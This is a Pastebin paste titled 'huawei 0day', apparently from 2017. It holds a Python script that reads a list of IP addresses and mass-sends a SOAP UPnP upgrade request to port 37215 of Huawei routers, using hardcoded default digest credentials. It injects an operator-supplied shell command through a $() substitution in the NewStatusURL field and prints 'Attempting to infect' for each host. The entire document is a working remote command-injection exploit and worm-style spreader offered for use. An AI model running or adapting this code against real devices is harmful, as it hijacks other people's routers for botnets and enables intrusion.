miraip0ts

huawei 0day

Dec 25th, 2017
8,680
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import threading, sys, time, random, socket, re, os, struct, array, requests
  2. from requests.auth import HTTPDigestAuth
  3. ips = open(sys.argv[1], "r").readlines()
  4. cmd = "" # Your MIPS (SSHD)
  5. rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
  6.  
  7. class exploit(threading.Thread):
  8.         def __init__ (self, ip):
  9.             threading.Thread.__init__(self)
  10.             self.ip = str(ip).rstrip('\n')
  11.         def run(self):
  12.             try:
  13.                 url = "http://" + self.ip + ":37215/ctrlt/DeviceUpgrade_1"
  14.                 requests.post(url, timeout=5, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
  15.                 print "[SOAP] Attempting to infect " + self.ip
  16.             except Exception as e:
  17.                 pass
  18.  
  19. for ip in ips:
  20.     try:
  21.         n = exploit(ip)
  22.         n.start()
  23.         time.sleep(0.03)
  24.     except:
  25.         pass
RAW Paste Data